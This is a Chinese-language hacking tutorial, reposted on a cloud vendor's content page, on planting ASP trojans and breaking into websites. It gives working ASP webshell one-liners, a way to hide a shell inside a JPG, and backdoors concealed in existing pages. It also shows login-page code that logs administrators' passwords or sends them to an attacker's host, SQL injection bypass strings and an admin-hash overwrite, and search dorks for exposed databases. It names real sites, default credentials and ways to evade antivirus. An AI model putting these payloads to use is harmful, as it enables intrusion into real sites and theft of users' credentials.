讓你變成ASP木馬高手_安全教程

來源:互聯網
上載者:User
1.名稱:如何製作圖片ASP木馬 (可顯示圖片) 
建一個asp檔案,內容為<!--#i nclude file="ating.jpg"--> 
找一個正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進行hex編譯,插入圖片裡,為 
了運行成功,還要搜尋<%和%>,將其變為00,(不要替換自己asp的),再把jpg檔案開頭加入 
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT> 

2. 名稱:整蠱網吧 
先用精銳網吧協助工具輔助得到使用者名稱和密碼,然後用電腦管理連接一台機器,開telnet,串連,開共用, 

複製一個木馬過去運行即可。 

3.名稱:感受MD5暴力破解的魅力 
rainbowcrack用法先用rtgen產生庫 "rtgen md5 byte 1 7 5 2400 40000 all" 
1和7代表密碼最小和最大長度 
阿汀我再加個方法:http://md5.rednoize.com/ 線上破解 
或者到http://www.md5lookup.com/?category=01-3&;searck=on 

4.很多時候我們做免殺木馬,不用懂彙編,用北鬥加殼程式就能逃殺,還有很多加殼軟體,大家木馬加殼 

的時候最好多選擇不知名的加殼軟體 

5.名稱:隱形插入型ASP木馬 
(1)在我們要做手腳的asp檔案裡加入如下內容 
<%if request("action")="ok" then%> 
shell代碼插在這裡,最好是小馬,還要加密一下 
<%end if%> 
訪問的時候在你作手腳的asp檔案後面加上?action=ok,即可 
(2)另一種方法,在我們要做手腳的asp檔案裡加入如下內容 
<% 
on error resume next 
strFileName = Request.QueryString("filer") 
set objStream = Server.createObject("ABODB.Stream") 
objStream.Type = 1 
objStream.Open 
objStream.LoadFromFile strFileName 
objStream.SaveToFile Server.mappath("ating.asp"),2 
%> 
訪問的時候在做手腳的asp檔案後面加上?filer=XXX 
XXX為你本地上傳的一個路徑如 c:ating123.asp 
上傳後在做手腳的asp的同檔案夾中有ating,asp 
(3)前提得到system許可權, 
進入網站目錄下一層 
mkdir s… 
copy ating.asp s…/ 
這樣殺毒軟體找不到的 
訪問http://網站/s…/ating.asp即可 

6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在該電腦產生一個超級使用者 使用者名稱為: 

hack 密碼110,在DOS下和電腦管理器上看不到你建立的使用者,並且是刪除不掉的 

7.名稱:QQ群指令碼攻擊 
開啟qq對話誆,複製訊息,然後 
下面的內容儲存為.vbs 檔案,運行即可 
Set WshShell= WScript.createobject("WScript.Shell") 
WshShell.AppActivate "QQ資訊攻擊指令碼" 
for i=1 to 20 
WScript.Sleep 1000 
WshShell.SendKeys"^v" 
WshShell.SendKeys i 
WshShell.SendKeys "%s" 
Next 

8.搜尋:程式製作:萬鵬 有免費申請空間的,直接上傳asp馬即可 

9. 名稱:全面找出你站上的ASP木馬 
(1) 用殺毒軟體 
(2) 用FTP用戶端軟體,點"工具"->"比較檔案夾" 
(3) 用asplist2.0.asp上傳到網站空間查看,一般功能多的ASP我估計就是ASP木馬 
(4) 用工具Beyond Compare 

10名稱:拓展思路拿DVBBS帳號 "一個人的聖經"的動畫 
(1)以前獲得webshell後想進入DVBBS的後台,想要管理員的密碼,可以這樣 
老辦法: 
修改admin_login.asp得到明文DVBBS後台密碼 
在"username=trim(replace(request("username")這行後面 
Dim fsoObject 
Dim tsObject 
Set fsoObject = Server.createObject("Scripting.FileSystemObject") 
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) 
tsObject.Write CStr(request("password")) 
Set fsoObject = Nothing 
Set tsObject = Nothing 
只要管理員登陸後台,在目錄下就產生了laner.txt 
(2)login.asp中Case "login_chk"下: 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&request("username")&"text:"&request("password")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
這樣laner.asp將獲得全部登陸人的登陸時間,使用者名稱和密碼 
(3)如果你有自己的網站或者另外的webshell(強烈建議使用): 
可以建立目錄laner,在裡面建立一個空的laner.asp和如下代碼的rain.asp: 
<%if request("n")<>"" and request("p")<>"" then 
on error resume next 
Dim rain 
set rain=server.createobject("adodb.stream") 
rain.Type=2 
rain.CharSet="gb2312" 
rain.Position=rain.Size 
rain.Open 
rain.LoadFromFile server.MapPath("laner.asp") 
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10) 
rain.SaveToFile server.MapPath("laner.asp"),2 
rain.Close 
set rain=nothing 
end if%> 

11. 名稱:利用QQ線上狀態抓鴿子肉雞 
產生qq線上狀態,把裡面的地址改成木馬地址,發到論壇 
在login.asp那裡插入一句: 
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username") 

&""&"&p="&request("password")&"></script>" 
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username") 

&""&"&p="&request("password")&"></iframe>" 
結果所有登陸人都會乖乖的把名字和密碼送到你的laner.asp 裡 

12. 動畫名稱:媒體中國整站程式存在多處漏洞 
漏洞程式:媒體中國整站程式(第一版) 
官方網站:http://meiti.elgod.com/ 
漏洞: %5c(暴庫) 上傳 注入 
上傳頁面:down1/upload.asp 

13. 名稱:免付費電話+MSH命令列工具 
http://www.globe7.com/ 開啟首頁,點擊坐下角,Free DownLoad,下載到本地,安裝, 
運行後,會提示正在尋找你所在地區的區號。由於是國際長途,註冊一個帳號,送100美分,國內計時 

0.01/分,你就有100分鐘可以白打。是一個帳號哦。 
要注意的就是,固定電話,小靈通 形式為0086521123456 521本來時0521,要省略前面的零,手機號也 

是一樣。 

14. 名稱:Bo-Blog的新漏洞 
http://網址/index.php?job=../admin/ban 
把其中"禁止搜尋的詞"那部分<table>另存出來,裡面的地址改完整,插入一句話木馬 

15. 名稱:鉤魂者入侵傳奇私服 
用百度 搜尋 傳奇 inurl:tuku 
或者 傳奇 inurl:wplm.htm 
再或者 傳奇 inurl:coolsites.asp 
友情連結裡插入一句話木馬即可 

16. 程式: 宏達企業整站上傳漏洞 
官方首頁:http://www.mu126.com/ 
漏洞頁面:/cx/upfile.asp (上傳漏洞) 

17.無間盜郵箱,在修改密碼裡,使用者名稱和密碼裡添or=or 

18.名稱: bbsxp5.16後台得到webshell 
bbsxp5.16過濾了 asp,asp,cdx,cer,副檔名的檔案上傳,就是在基本設定上添加上上傳類型也不行,並禁 

止了修改資料備份資料名稱,我們可以把此網頁儲存在本地,改原始碼上傳。 

19.名稱:JHACKJ 2005年最新精典教程 
下載看看吧,不錯,各大網站都有 

20.名稱:省力入侵韓國肉雞 
在啊D的掃描注入點項,開啟這個:http://www.google.co.kr/advanced_search?hl=zh-CN 
這是進階搜尋項,關鍵字隨便寫。這裡我寫asp?name= 設定為每頁顯示100條。 
語種選擇韓文。搜尋,很多sa. 

21.名稱:任何網吧的管理系統破解 
選智能ABC,然後vv輸入,游標後退兩步,按delete鍵 剛輸入的兩個vv刪除 
最後按Inter鍵 

22.名稱:破解QQ空間插入網頁木馬的代碼 
現在騰訊 已經封了很多QQ空間代碼了 就如 以前 <iframe src="木馬地址" name="lcx" width="0" 

height="0" frameborder="0"></iframe>插入網頁木馬的代碼也早被封了 
突破禁用的方法 代碼如下: 
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木馬地址 width=190 height=190 

marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\" 

style=display:none></div> 

最後附上 卡拉是條ok 總結的 
1.上傳漏洞[不多講] 
pS: 如果看到:選擇你要上傳的檔案 [重新上傳]或者出現"請登陸後使用",80%就有漏洞了! 
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳. 

2.注入漏洞[不多講] 
pS:對MD5密碼.有時我們不是哪麼容易跑出來.如果是[SQL資料庫].那麼我們可以用以下命令: 
http://注入網址;update admin set password=\新MD5密碼\ where password=\舊MD5密碼\-- 

[admin為表名.] 


3.旁註,也就是跨站. 
我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一伺服器的網站,然後在利用這個 

網站用提權,嗅探等方法來入侵我們 要入侵的網站。,在這裡有個痛點,就是一些伺服器的絕對路徑經 

過加密,這就看我們的本事了 


4.暴庫:把二級目錄中間的/換成%5c 
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=職責範圍&BigClassType=1 
如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一個有效路徑。 確定路 

徑名稱拼字是否正確,以及是否 串連到檔案存放的伺服器。 
這樣的就是資料庫了。下載時用FLASHGET換成.MDB格式的就行. 


5.\or\=\or\這是一個可以串連SQL的語名句.可以直接進入後台。我收集了一下。類似的還有: 
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a 

6.社交工程學。這個我們都知道吧。就是猜解。 
 EY:http://www.neu.edu.cn/waishi/admin 
admin waishi 

7.寫入ASP格式資料庫。就是一句話木馬[<%execute request("value")%> ],常用在留言本. 
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的資料庫],再寫入一句話 

木馬 


8.源碼利用:一些網站用的都是網上下載的源碼.有的站長很菜.什麼也不改. 
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp 
這個站用的是:傑出校友錄,源碼我下過了, 
預設資料庫/webshell路徑:databaseliangu_data.mdb 後台管理:adm_login.asp 密碼及使用者名稱都是 

admin 


9.預設資料庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL. 
/Databackup/dvbbs7.MDB 
/bbs/Databackup/dvbbs7.MDB 
/bbs/Data/dvbbs7.MDB 
/data/dvbbs7.mdb 
/bbs/diy.asp 
/diy.asp 
/bbs/cmd.asp 
/bbs/cmd.exe 
/bbs/s-u.exe 
/bbs/servu.exe 
工具:網站獵手 挖掘雞 
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB 

10.查看目錄法:人一些網站可以斷開目錄,可以方問目錄。 
EY:http://www.ujs168.com/shop/admin/ 
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/ 
這樣我們可以找到資料庫,下載不用我教吧 

11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL] 

12.搜尋引擎利用: 

(1).inurl:flasher_list.asp 預設資料庫:database/flash.mdb 後台/manager/ 
(2).找網站的管理後台地址: 
site:xxxx.comintext:管理 
site:xxxx.comintitle:管理 <關鍵字很多,自已找> 
site:xxxx.cominurl:login 
(3).尋找access的資料庫,mssql、mysql的串連檔案 
allinurl:bbsdata 
filetype:mdbinurl:database 
filetype:incconn 
inurl:datafiletype:mdb 
我主不做了。。自已做做吧。。 

13.COOKIE欺騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。 

這個我就不多講了 


14.利用常見的漏洞:如動網BBS 
EY:http://js1011.com/bbs/index.asp 
可以先用:dvbbs許可權提升工具,使自已成為前台管理員。 
THEN,運用:動網固頂貼工具,找個固頂貼,再取得COOKIES,這個要你自已做。我們可以用WSockExpert 

取得Cookies/NC包 
這個我就不做了,網上教程多的是,自已下個看看。 
工具:dvbbs許可權提升工具 動網固頂貼工具 

15.還有一些老漏洞。如IIS3,4的查看源碼,5的delete 
CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什麼大用途。
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.